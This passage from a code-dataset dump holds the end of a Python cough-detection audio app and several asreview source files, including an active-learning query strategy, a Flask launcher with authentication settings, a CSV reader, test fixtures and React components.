os.path.exists(file_path):\n os.remove(file_path)\n\n return results\n\n\n# record audio\ndef record_audio():\n CHUNK = 1024\n FORMAT = pyaudio.paInt16\n CHANNELS = 2\n RATE = 22050\n RECORD_SECONDS = 3\n\n WAVE_OUTPUT_FILENAME = r\"Sound_Folders/Test_Sounds/Test_Sound/output\" + str(time.time()) + \".wav\"\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n frames_per_buffer=CHUNK)\n\n print(\"\\n-- recording for 3 seconds --\")\n\n frames = []\n\n for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n data = stream.read(CHUNK)\n frames.append(data)\n\n print(\"-- done recording --\\n\")\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n wf = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n wf.setnchannels(CHANNELS)\n wf.setsampwidth(p.get_sample_size(FORMAT))\n wf.setframerate(RATE)\n wf.writeframes(b''.join(frames))\n wf.close()\n\n return WAVE_OUTPUT_FILENAME\n\n\n# randomise the data, create train_list & test_list\ndef randomiseOrder(dataset_location, num_train_samples):\n dataset = pd.read_csv(dataset_location)\n\n # randomise the data and create training set\n while len(train_list) < num_train_samples:\n random_index = random.randint(0, len(dataset) - 1)\n random_sample = dataset.iloc[random_index]\n train_list.append(random_sample)\n\n i = dataset[(dataset.filename == random_sample.iloc[0])].index\n dataset.drop(i, inplace=True)\n dataset.reset_index(drop=True, inplace=True)\n\n # set remaining data to test set\n current_index = 0\n while current_index < len(dataset):\n sample = dataset.iloc[current_index]\n test_list.append(sample)\n current_index += 1\n\n\n# train model and test\ndef train_and_test(mfcc_count):\n # create CSV files for dataset, training set, testing set (boolean label)\n createCSV('filename', mfcc_count, True, 'Datasets/dataset.csv')\n createCSV('', mfcc_count, True, 'Datasets/training_set.csv')\n createCSV('', mfcc_count, True, 'Datasets/testing_set.csv')\n\n # create mfcc sets (boolean trimming)\n createInitialSet('Sound_Folders/Cough_Recordings', True, 30, 'Datasets/dataset.csv', 1, True)\n createInitialSet('Sound_Folders/Training_Sounds', False, 0, 'Datasets/dataset.csv', 2, True)\n\n # randomise the data order\n randomiseOrder('Datasets/dataset.csv', 112)\n\n # store the randomised and categorised sets back as separate csv files\n storeSet('Datasets/training_set.csv', train_list, 112, mfcc_count)\n storeSet('Datasets/testing_set.csv', test_list, 28, mfcc_count)\n\n # train\n train(mfcc_count, 'Datasets/training_set.csv', 'Datasets/testing_set.csv', True)\n\n\ndef recordAudio():\n path = record_audio()\n results = test_new_data(path, False, 39)\n showinfo(\"Window\", results[0])\n\n\ndef runTest():\n results = test_new_data('', True, 39)\n results_string = ''\n\n for e in results:\n results_string += str(e) + '\\n'\n showinfo(\"Results\", results_string)\n\n\ndef trainData():\n train_and_test(39)\n\n\ndef test_function():\n print(\"Hello World!\")\n\n\ndef copy_uploaded_files_to_cough_test(list_of_files, location):\n for file in list_of_files:\n shutil.copy(file, location)\n" } ]
2
terrymyc/asreview
https://github.com/terrymyc/asreview
7cc689a017d69205a54dc4693978cc6def35a4bd
f2b5e778560121c508fdfca2080f975df2180c17
93407152ec74c5773a1883aa53707c27d147f534
refs/heads/master
2023-08-24T00:15:26.022593
2023-08-10T13:46:49
2023-08-10T13:46:49
237,174,244
0
0
Apache-2.0
2020-01-30T08:56:39
2021-12-16T13:30:52
2022-05-20T20:10:47
Python
[ { "alpha_fraction": 0.6104651093482971, "alphanum_fraction": 0.629123866558075, "avg_line_length": 35.7960205078125, "blob_id": "12057738f7a6b36427972f55ecebcf9a4153e5a7", "content_id": "c21e32aa952b8c6aa8f55a7a2bda535ea89269fa", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7396, "license_type": "permissive", "max_line_length": 88, "num_lines": 201, "path": "/asreview/models/query/mixed.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport numpy as np\n\nfrom asreview.models.query.base import BaseQueryStrategy\nfrom asreview.models.query.utils import get_query_model\nfrom asreview.utils import get_random_state\n\n\ndef _parse_mixed_kwargs(kwargs, strategy_name):\n kwargs_new = {}\n for key, value in kwargs.items():\n if key.startswith(strategy_name):\n new_key = key[len(strategy_name) + 1 :]\n kwargs_new[new_key] = value\n\n return kwargs_new\n\n\nclass MixedQuery(BaseQueryStrategy):\n \"\"\"Mixed query strategy.\n\n Use two different query strategies at the same time with a\n ratio of one to the other. A mix of two query strategies is used. For\n example mixing max and random sampling with a mix ratio of 0.95 would mean\n that at each query 95% of the instances would be sampled with the max\n query strategy after which the remaining 5% would be sampled with the\n random query strategy. It would be called the `max_random` query strategy.\n Every combination of primitive query strategy is possible.\n\n Arguments\n ---------\n strategy_1: str\n Name of the first query strategy. Default 'max'.\n strategy_2: str\n Name of the second query strategy. Default 'random'\n mix_ratio: float\n Sampling from strategy_1 and strategy_2 according a Bernoulli\n distribution. E.g. for mix_ratio=0.95, this implies strategy_1\n with probability 0.95 and strategy_2 with probability 0.05.\n Default 0.95.\n random_state: float\n Seed for the numpy random number generator.\n **kwargs: dict\n Keyword arguments for the two strategy. To specify which of the\n strategies the argument is for, prepend with the name of the query\n strategy and an underscore, e.g. 'max' for maximal sampling.\n \"\"\"\n\n def __init__(\n self,\n strategy_1=\"max\",\n strategy_2=\"random\",\n mix_ratio=0.95,\n random_state=None,\n **kwargs\n ):\n \"\"\"Initialize the Mixed query strategy.\"\"\"\n super(MixedQuery, self).__init__()\n\n self.strategy_1 = strategy_1\n self.strategy_2 = strategy_2\n\n self.mix_ratio = mix_ratio\n self._random_state = get_random_state(random_state)\n\n self.kwargs_1 = _parse_mixed_kwargs(kwargs, strategy_1)\n self.kwargs_2 = _parse_mixed_kwargs(kwargs, strategy_2)\n\n self.query_model1 = get_query_model(strategy_1, **self.kwargs_1)\n if \"random_state\" in self.query_model1.default_param:\n self.query_model1 = get_query_model(\n strategy_1, random_state=self._random_state, **self.kwargs_1\n )\n\n self.query_model2 = get_query_model(strategy_2, **self.kwargs_2)\n if \"random_state\" in self.query_model2.default_param:\n self.query_model2 = get_query_model(\n strategy_2, random_state=self._random_state, **self.kwargs_2\n )\n\n def query(self, X, classifier, n_instances=None, **kwargs):\n # set the number of instances to len(X) if None\n if n_instances is None:\n n_instances = X.shape[0]\n\n # compute the predictions\n predictions = classifier.predict_proba(X)\n\n # Perform the query with strategy 1.\n try:\n query_idx_1 = self.query_model1._query(predictions, n_instances=n_instances)\n except AttributeError:\n # for random for example\n query_idx_1 = self.query_model1.query(X, classifier, n_instances)\n\n # Perform the query with strategy 2.\n try:\n query_idx_2 = self.query_model2._query(predictions, n_instances=n_instances)\n except AttributeError:\n # for random for example\n query_idx_2 = self.query_model2.query(X, classifier, n_instances)\n\n # mix the 2 query strategies into one list\n query_idx_mix = []\n i = 0\n j = 0\n\n while i < len(query_idx_1) and j < len(query_idx_2):\n if self._random_state.rand() < self.mix_ratio:\n query_idx_mix.append(query_idx_1[i])\n i = i + 1\n else:\n query_idx_mix.append(query_idx_2[j])\n j = j + 1\n\n indexes = np.unique(query_idx_mix, return_index=True)[1]\n return [query_idx_mix[i] for i in sorted(indexes)][0:n_instances]\n\n def full_hyper_space(self):\n from hyperopt import hp\n\n space_1, choices_1 = self.query_model1.hyper_space()\n space_2, choices_2 = self.query_model2.hyper_space()\n parameter_space = {}\n hyper_choices = {}\n for key, value in space_1.items():\n new_key = \"qry_\" + self.strategy_1 + key[4:]\n parameter_space[new_key] = value\n hyper_choices[new_key] = choices_1[key]\n\n for key, value in space_2.items():\n new_key = \"qry_\" + self.strategy_2 + key[4:]\n parameter_space[new_key] = value\n hyper_choices[new_key] = choices_2[key]\n\n parameter_space[\"qry_mix_ratio\"] = hp.uniform(\"qry_mix_ratio\", 0, 1)\n\n return parameter_space, hyper_choices\n\n @property\n def name(self):\n return \"_\".join([self.strategy_1, self.strategy_2])\n\n\nclass MaxRandomQuery(MixedQuery):\n \"\"\"Mixed (95% Maximum and 5% Random) query strategy (``max_random``).\n\n A mix of maximum and random query strategies with a mix ratio of 0.95.\n At each query 95% of the instances would be sampled with the maximum\n query strategy after which the remaining 5% would be sampled with\n the random query strategy.\n \"\"\"\n\n name = \"max_random\"\n label = \"Mixed (95% Maximum and 5% Random)\"\n\n def __init__(self, mix_ratio=0.95, random_state=None, **kwargs):\n \"\"\"Initialize the Mixed (Maximum and Random) query strategy.\"\"\"\n super(MaxRandomQuery, self).__init__(\n strategy_1=\"max\",\n strategy_2=\"random\",\n mix_ratio=mix_ratio,\n random_state=random_state,\n **kwargs\n )\n\n\nclass MaxUncertaintyQuery(MixedQuery):\n \"\"\"Mixed (95% Maximum and 5% Uncertainty) query strategy (``max_uncertainty``).\n\n A mix of maximum and random query strategies with a mix ratio of 0.95.\n At each query 95% of the instances would be sampled with the maximum\n query strategy after which the remaining 5% would be sampled with\n the uncertainty query strategy.\n \"\"\"\n\n name = \"max_uncertainty\"\n label = \"Mixed (95% Maximum and 5% Uncertainty)\"\n\n def __init__(self, mix_ratio=0.95, random_state=None, **kwargs):\n \"\"\"Initialize the Mixed (Maximum and Uncertainty) query strategy.\"\"\"\n super(MaxUncertaintyQuery, self).__init__(\n strategy_1=\"max\",\n strategy_2=\"uncertainty\",\n mix_ratio=mix_ratio,\n random_state=random_state,\n **kwargs\n )\n" }, { "alpha_fraction": 0.6771159768104553, "alphanum_fraction": 0.6771159768104553, "avg_line_length": 25.58333396911621, "blob_id": "70b55dd8185160911028e0ae1b393b800d99472e", "content_id": "dc11a8590d05d99988aceb3013e55e359b0c003c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 319, "license_type": "permissive", "max_line_length": 50, "num_lines": 12, "path": "/asreview/webapp/src/hooks/useAuth.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport AuthContext from \"../context/AuthProvider\";\n\nconst useAuth = () => {\n const { auth } = React.useContext(AuthContext);\n React.useDebugValue(auth, (auth) =>\n auth?.logged_in ? \"Signed In\" : \"Signed Out\",\n );\n return React.useContext(AuthContext);\n};\n\nexport default useAuth;\n" }, { "alpha_fraction": 0.6110979914665222, "alphanum_fraction": 0.6138192415237427, "avg_line_length": 31.136882781982422, "blob_id": "a48ecdcc21b2e473c424413c2c8a283ace839a38", "content_id": "7eb6f6e4e0b16992bf46906187ff873352f07f09", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16904, "license_type": "permissive", "max_line_length": 89, "num_lines": 526, "path": "/asreview/webapp/start_flask.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport logging\nimport os\nimport socket\nimport webbrowser\nfrom pathlib import Path\nfrom threading import Timer\n\ntry:\n import tomllib\nexcept ImportError:\n import tomli as tomllib\n\nfrom flask import Flask\nfrom flask import send_from_directory\nfrom flask.json import jsonify\nfrom flask.templating import render_template\nfrom flask_cors import CORS\nfrom flask_login import LoginManager\nfrom gevent.pywsgi import WSGIServer\nfrom werkzeug.exceptions import InternalServerError\n\nfrom asreview import __version__ as asreview_version\nfrom asreview._deprecated import DeprecateAction\nfrom asreview._deprecated import mark_deprecated_help_strings\nfrom asreview.project import ASReviewProject\nfrom asreview.project import get_project_path\nfrom asreview.project import get_projects\nfrom asreview.utils import asreview_path\nfrom asreview.webapp import DB\nfrom asreview.webapp.api import auth\nfrom asreview.webapp.api import projects\nfrom asreview.webapp.api import team\nfrom asreview.webapp.authentication.models import User\nfrom asreview.webapp.authentication.oauth_handler import OAuthHandler\n\n# Host name\nHOST_NAME = os.getenv(\"ASREVIEW_HOST\")\nif HOST_NAME is None:\n HOST_NAME = \"localhost\"\n# Default Port number\nPORT_NUMBER = 5000\n\n# set logging level\nif (\n os.environ.get(\"FLASK_DEBUG\", \"\") == \"1\"\n or os.environ.get(\"DEBUG\", \"\") == \"1\"\n or os.environ.get(\"FLASK_ENV\", \"\") == \"development\"\n):\n logging.basicConfig(level=logging.DEBUG)\nelse:\n logging.basicConfig(level=logging.INFO)\n\n\ndef _url(host, port, protocol):\n \"\"\"Create url from host and port.\"\"\"\n return f\"{protocol}{host}:{port}/\"\n\n\ndef _check_port_in_use(host, port):\n \"\"\"Check if port is already in use.\n\n Arguments\n ---------\n host: str\n The current host.\n port: int\n The host port to be checked.\n\n Returns\n -------\n bool:\n True if port is in use, false otherwise.\n \"\"\"\n logging.info(f\"Checking if host and port are available :: {host}:{port}\")\n host = host.replace(\"https://\", \"\").replace(\"http://\", \"\")\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n return s.connect_ex((host, port)) == 0\n\n\ndef _open_browser(host, port, protocol, no_browser):\n \"\"\"Open ASReview in browser if flag is set.\n\n Otherwise, it displays an alert to copy and paste the url\n at which ASReview is currently served.\n \"\"\"\n if no_browser:\n print(\n \"\\nTo access ASReview LAB, copy and paste \"\n \"this url in a browser \"\n f\"{_url(host, port, protocol)}\\n\"\n )\n return\n\n start_url = _url(host, port, protocol)\n Timer(1, lambda: webbrowser.open_new(start_url)).start()\n print(\n f\"Start browser at {start_url}\"\n \"\\n\\n\\n\\nIf your browser doesn't open. \"\n f\"Please navigate to '{start_url}'\\n\\n\\n\\n\"\n )\n\n\ndef _lab_parser():\n # parse arguments if available\n parser = argparse.ArgumentParser(\n prog=\"lab\",\n description=\"\"\"ASReview LAB - Active learning for Systematic Reviews.\"\"\", # noqa\n formatter_class=argparse.RawTextHelpFormatter,\n )\n\n parser.add_argument(\n \"--clean-project\",\n dest=\"clean_project\",\n default=None,\n type=str,\n help=\"Safe cleanup of temporary files in project.\",\n )\n\n parser.add_argument(\n \"--clean-all-projects\",\n dest=\"clean_all_projects\",\n default=None,\n action=\"store_true\",\n help=\"Safe cleanup of temporary files in all projects.\",\n )\n\n parser.add_argument(\n \"--ip\",\n default=HOST_NAME,\n type=str,\n action=DeprecateAction,\n help=\"The IP address the server will listen on. Use the --host argument.\",\n )\n\n parser.add_argument(\n \"--host\",\n default=HOST_NAME,\n type=str,\n help=\"The IP address the server will listen on.\",\n )\n\n parser.add_argument(\n \"--port\",\n default=PORT_NUMBER,\n type=int,\n help=\"The port the server will listen on.\",\n )\n\n parser.add_argument(\n \"--enable-auth\",\n dest=\"enable_authentication\",\n action=\"store_true\",\n help=\"Enable authentication.\",\n )\n\n parser.add_argument(\n \"--secret-key\",\n default=None,\n type=str,\n help=\"Secret key for authentication.\",\n )\n\n parser.add_argument(\n \"--salt\",\n default=None,\n type=str,\n help=\"When using authentication, a salt code is needed\" \"for hasing passwords.\",\n )\n\n parser.add_argument(\n \"--flask-configfile\",\n default=\"\",\n type=str,\n help=\"Full path to a TOML file containing Flask parameters\"\n \"for authentication.\",\n )\n\n parser.add_argument(\n \"--no-browser\",\n dest=\"no_browser\",\n action=\"store_true\",\n help=\"Do not open ASReview LAB in a browser after startup.\",\n )\n\n parser.add_argument(\n \"--port-retries\",\n dest=\"port_retries\",\n default=50,\n type=int,\n help=\"The number of additional ports to try if the\"\n \"specified port is not available.\",\n )\n\n parser.add_argument(\n \"--certfile\",\n default=\"\",\n type=str,\n help=\"The full path to an SSL/TLS certificate file.\",\n )\n\n parser.add_argument(\n \"--keyfile\",\n default=\"\",\n type=str,\n help=\"The full path to a private key file for usage with SSL/TLS.\",\n )\n\n parser.add_argument(\n \"--config_file\",\n type=str,\n default=None,\n help=\"Deprecated, see subcommand simulate.\",\n action=DeprecateAction,\n )\n\n parser.add_argument(\n \"--seed\",\n default=None,\n type=int,\n help=\"Deprecated, see subcommand simulate.\",\n action=DeprecateAction,\n )\n\n parser.add_argument(\n \"--embedding\",\n type=str,\n default=None,\n dest=\"embedding_fp\",\n help=\"File path of embedding matrix. Required for LSTM models.\",\n )\n return parser\n\n\ndef create_app(**kwargs):\n app = Flask(\n __name__,\n instance_relative_config=True,\n static_folder=\"build/static\",\n template_folder=\"build\",\n )\n\n # Get the ASReview arguments.\n app.config[\"asr_kwargs\"] = kwargs\n app.config[\"AUTHENTICATION_ENABLED\"] = kwargs.get(\"enable_authentication\", False)\n app.config[\"SECRET_KEY\"] = kwargs.get(\"secret_key\", False)\n app.config[\"SECURITY_PASSWORD_SALT\"] = kwargs.get(\"salt\", False)\n app.config[\"PORT\"] = kwargs.get(\"port\")\n app.config[\"HOST\"] = kwargs.get(\"host\")\n\n # Read config parameters if possible, this overrides\n # the previous assignments.\n config_file_path = kwargs.get(\"flask_configfile\", \"\").strip()\n # Use absolute path, because otherwise it is relative to the config root.\n if config_file_path != \"\":\n config_file_path = Path(config_file_path)\n if config_file_path.suffix == \".toml\":\n app.config.from_file(\n config_file_path.absolute(), load=tomllib.load, text=False\n )\n else:\n raise ValueError(\"'flask_configfile' should have a .toml extension\")\n\n # If the frontend runs on a different port, or even on a different\n # URL, then allowed-origins must be set to avoid CORS issues. You can\n # set the allowed-origins in the config file. In the previous lines\n # the config file has been read.\n # If the allowed-origins are not set by now, they are set to\n # False, which will bypass setting any CORS parameters!\n if not app.config.get(\"ALLOWED_ORIGINS\", False):\n app.config[\"ALLOWED_ORIGINS\"] = False\n\n # set env (test / development / production) according to\n # Flask 2.2 specs (ENV is deprecated)\n if app.config.get(\"TESTING\", None) is True:\n env = \"test\"\n elif app.config.get(\"DEBUG\", None) is True:\n env = \"development\"\n else:\n env = \"production\"\n\n # config JSON Web Tokens\n login_manager = LoginManager(app)\n login_manager.init_app(app)\n login_manager.session_protection = \"strong\"\n\n if app.config[\"AUTHENTICATION_ENABLED\"] is False:\n # This is necessary to pass the test_webapp.py tests\n @login_manager.user_loader\n def load_user(user_id):\n return False\n\n # setup all database/authentication related resources,\n # only do this when AUTHENTICATION_ENABLED is explicitly True\n elif app.config[\"AUTHENTICATION_ENABLED\"] is True:\n # Register a callback function for current_user.\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(int(user_id))\n\n # In this code-block we make sure certain authentication-related\n # config parameters are set.\n # TODO: should I raise a custom Exception, like MissingParameterError?\n if not app.config.get(\"SECRET_KEY\", False):\n raise ValueError(\n \"Please start an authenticated app with a \"\n + \"secret key parameter (SECRET_KEY)\"\n )\n\n if not app.config.get(\"SECURITY_PASSWORD_SALT\", False):\n raise ValueError(\n \"Please start an authenticated app with a \"\n + \"security password salt (SECURITY_PASSWORD_SALT)\"\n )\n\n if app.config.get(\"EMAIL_VERIFICATION\", False) and not app.config.get(\n \"EMAIL_CONFIG\", False\n ):\n raise ValueError(\n \"Missing email configuration to facilitate email verification\"\n )\n\n # set email config for Flask-Mail\n conf = app.config.get(\"EMAIL_CONFIG\", {})\n app.config[\"MAIL_SERVER\"] = conf.get(\"SERVER\")\n app.config[\"MAIL_PORT\"] = conf.get(\"PORT\", 465)\n app.config[\"MAIL_USERNAME\"] = conf.get(\"USERNAME\")\n app.config[\"MAIL_PASSWORD\"] = conf.get(\"PASSWORD\")\n app.config[\"MAIL_USE_TLS\"] = conf.get(\"USE_TLS\", False)\n app.config[\"MAIL_USE_SSL\"] = conf.get(\"USE_SSL\", False)\n app.config[\"MAIL_REPLY_ADDRESS\"] = conf.get(\"REPLY_ADDRESS\")\n\n # We must be sure we have a database URI\n if not app.config.get(\"SQLALCHEMY_DATABASE_URI\", False):\n # create default path\n uri = os.path.join(asreview_path(), f\"asreview.{env}.sqlite\")\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = f\"sqlite:///{uri}\"\n\n # store oauth config in oauth handler\n if bool(app.config.get(\"OAUTH\", False)):\n app.config[\"OAUTH\"] = OAuthHandler(app.config[\"OAUTH\"])\n\n # create the database plus table(s)\n DB.init_app(app)\n with app.app_context():\n DB.create_all()\n\n # Ensure the instance folder exists.\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n # We only need CORS if they are necessary: when the frontend is\n # running on a different port, or even url, we need to set the\n # allowed origins to avoid CORS problems. The allowed-origins\n # can be set in the config file.\n if app.config.get(\"ALLOWED_ORIGINS\", False):\n CORS(app, origins=app.config.get(\"ALLOWED_ORIGINS\"), supports_credentials=True)\n\n with app.app_context():\n app.register_blueprint(projects.bp)\n app.register_blueprint(auth.bp)\n app.register_blueprint(team.bp)\n\n @app.errorhandler(InternalServerError)\n def error_500(e):\n original = getattr(e, \"original_exception\", None)\n\n if original is None:\n # direct 500 error, such as abort(500)\n logging.error(e)\n return jsonify(message=\"Whoops, something went wrong.\"), 500\n\n # wrapped unhandled error\n logging.error(e.original_exception)\n return jsonify(message=str(e.original_exception)), 500\n\n @app.route(\"/\", methods=[\"GET\"])\n @app.route(\"/projects/\", methods=[\"GET\"])\n @app.route(\"/projects/<project_id>/\", methods=[\"GET\"])\n @app.route(\"/projects/<project_id>/<tab>/\", methods=[\"GET\"])\n def index(**kwargs):\n return render_template(\"index.html\")\n\n @app.route(\"/favicon.ico\")\n def send_favicon():\n return send_from_directory(\n \"build\", \"favicon.ico\", mimetype=\"image/vnd.microsoft.icon\"\n )\n\n @app.route(\"/boot\", methods=[\"GET\"])\n def api_boot():\n \"\"\"Get the boot info.\"\"\"\n if app.config.get(\"DEBUG\", None) is True:\n status = \"development\"\n else:\n status = \"asreview\"\n\n # the big one\n authenticated = app.config.get(\"AUTHENTICATION_ENABLED\", False)\n\n response = {\n \"status\": status,\n \"authentication\": authenticated,\n \"version\": asreview_version,\n }\n\n # if we do authentication we have a lot of extra parameters\n if authenticated:\n # if recaptcha config is provided for account creation\n if app.config.get(\"RE_CAPTCHA_V3\", False):\n response[\"recaptchav3_key\"] = app.config[\"RE_CAPTCHA_V3\"].get(\n \"KEY\", False\n )\n\n # check if users can create accounts\n response[\"allow_account_creation\"] = app.config.get(\n \"ALLOW_ACCOUNT_CREATION\", False\n )\n\n response[\"allow_teams\"] = app.config.get(\"ALLOW_TEAMS\", False)\n\n # check if we are doing email verification\n response[\"email_verification\"] = bool(\n app.config.get(\"EMAIL_VERIFICATION\", False)\n )\n\n # check if there is an email server setup (forgot password)\n response[\"email_config\"] = bool(app.config.get(\"EMAIL_CONFIG\", False))\n\n # if oauth config is provided\n if isinstance(app.config.get(\"OAUTH\", False), OAuthHandler):\n params = app.config.get(\"OAUTH\").front_end_params()\n # and there something in it, just to be sure\n if params:\n response[\"oauth\"] = params\n\n return jsonify(response)\n\n return app\n\n\ndef main(argv):\n parser = _lab_parser()\n mark_deprecated_help_strings(parser)\n args = parser.parse_args(argv)\n\n app = create_app(**vars(args))\n app.config[\"PROPAGATE_EXCEPTIONS\"] = False\n\n # ssl certificate, key and protocol\n certfile = args.certfile\n keyfile = args.keyfile\n ssl_context = None\n if certfile and keyfile:\n protocol = \"https://\"\n ssl_context = (certfile, keyfile)\n else:\n protocol = \"http://\"\n\n # clean all projects\n # TODO@{Casper}: this needs a little bit\n # of work, we need to access all sub-folders\n if args.clean_all_projects:\n print(\"Cleaning all project files.\")\n for project in get_projects():\n project.clean_tmp_files()\n print(\"Done\")\n return\n\n # clean project by project_id\n # TODO@{Casper}: cleaning without a user context\n # is meaningless -> I think we should remove this\n # option\n if args.clean_project is not None:\n print(f\"Cleaning project file '{args.clean_project}'.\")\n ASReviewProject(get_project_path(args.clean_project)).clean_tmp_files()\n print(\"Done\")\n return\n\n flask_dev = app.config.get(\"DEBUG\", False)\n\n host = app.config.get(\"HOST\")\n port = app.config.get(\"PORT\")\n\n port_retries = args.port_retries\n # if port is already taken find another one\n if not flask_dev:\n original_port = port\n while _check_port_in_use(host, port) is True:\n old_port = port\n port = int(port) + 1\n if port - original_port >= port_retries:\n raise ConnectionError(\n \"Could not find an available port \\n\"\n \"to launch ASReview LAB. Last port \\n\"\n f\"was {str(port)}\"\n )\n print(f\"Port {old_port} is in use.\\n* Trying to start at {port}\")\n\n # open webbrowser if not in flask development mode\n if flask_dev is False:\n _open_browser(host, port, protocol, args.no_browser)\n\n # run app in flask mode only if we run in development mode\n if flask_dev is True:\n app.run(host=host, port=port, ssl_context=ssl_context)\n else:\n ssl_args = {\"keyfile\": keyfile, \"certfile\": certfile} if ssl_context else {}\n server = WSGIServer((host, port), app, **ssl_args)\n server.serve_forever()\n" }, { "alpha_fraction": 0.6124916076660156, "alphanum_fraction": 0.6245802640914917, "avg_line_length": 30.02083396911621, "blob_id": "242a74b9c60669482da5338aa84e82b2216e1175", "content_id": "8cfd0726659d58c0f53e3e9ba1ef880d5502ef53", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1489, "license_type": "permissive", "max_line_length": 82, "num_lines": 48, "path": "/asreview/io/csv_reader.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pandas as pd\n\nfrom asreview.io.utils import _standardize_dataframe\n\n\nclass CSVReader:\n \"\"\"CVS file reader.\"\"\"\n\n read_format = [\".csv\", \".tab\", \".tsv\"]\n write_format = [\".csv\", \".tsv\", \".xlsx\"]\n\n @classmethod\n def read_data(cls, fp):\n \"\"\"Import dataset.\n\n Arguments\n ---------\n fp: str, pathlib.Path\n File path to the CSV file.\n\n Returns\n -------\n list:\n List with entries.\n \"\"\"\n for encoding in [\"utf-8\", \"ISO-8859-1\"]:\n try:\n df = pd.read_csv(fp, sep=None, encoding=encoding, engine=\"python\")\n return _standardize_dataframe(df)\n except UnicodeDecodeError:\n # if unicode error, go to next encoding\n continue\n\n raise UnicodeDecodeError(\"The encoding of the file is not supported.\")\n" }, { "alpha_fraction": 0.6513761281967163, "alphanum_fraction": 0.6715596318244934, "avg_line_length": 27.6842098236084, "blob_id": "e1f9015a62eb89472a3de792735a190d416056eb", "content_id": "214a6fe4cff9c0d67e0cddafa3c100762d1a6c48", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1090, "license_type": "permissive", "max_line_length": 70, "num_lines": 38, "path": "/asreview/webapp/tests/test_database_and_models/conftest.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import pytest\n\nimport asreview.webapp.tests.utils.crud as crud\nfrom asreview.webapp import DB\n\n\[email protected]()\ndef setup_teardown(auth_app):\n \"\"\"A fixture for an authenticated app that ensures tests are\n started with no users and projects.\"\"\"\n assert crud.count_users() == 0\n assert crud.count_projects() == 0\n yield\n crud.delete_everything(DB)\n\n\[email protected]()\ndef test_data(auth_app):\n \"\"\"A fixture for an authenticated app, creates 3 users, first user\n has created 2 projects.\"\"\"\n user1, _ = crud.create_user1_with_2_projects(DB)\n user2 = crud.create_user(DB, user=2)\n user3 = crud.create_user(DB, user=3)\n assert crud.count_projects() == 2\n assert crud.count_users() == 3\n data = {\"user1\": user1, \"user2\": user2, \"user3\": user3}\n yield data\n crud.delete_everything(DB)\n\n\[email protected]()\ndef user(auth_app):\n \"\"\"A fixture for an authenticated app, creates a single user.\"\"\"\n assert crud.count_projects() == 0\n user = crud.create_user(DB, 1)\n assert crud.count_users() == 1\n yield user\n crud.delete_everything(DB)\n" }, { "alpha_fraction": 0.525212824344635, "alphanum_fraction": 0.5265225768089294, "avg_line_length": 21.130434036254883, "blob_id": "36b4954c2cc10911b5099af48f94458790a998d9", "content_id": "7e5da478105f93ac84ba58cecf2417b05768e170", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1527, "license_type": "permissive", "max_line_length": 50, "num_lines": 69, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/DecisionUndoBar.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { Button, Snackbar } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport {\n decisionUndoBarDuration,\n decisionUndoBarMarginBottom,\n} from \"../../globals.js\";\n\nconst PREFIX = \"DecisionUndoBar\";\n\nconst classes = {\n snackbar: `${PREFIX}-snackbar`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.snackbar}`]: {\n marginBottom: decisionUndoBarMarginBottom,\n [theme.breakpoints.down(\"md\")]: {\n marginBottom: 70,\n },\n },\n}));\n\nconst DecisionUndoBar = (props) => {\n const handleClose = (event, reason) => {\n props.close();\n };\n\n const handleUndo = (event, reason) => {\n props.undo();\n };\n\n let anchorOrigin = {\n 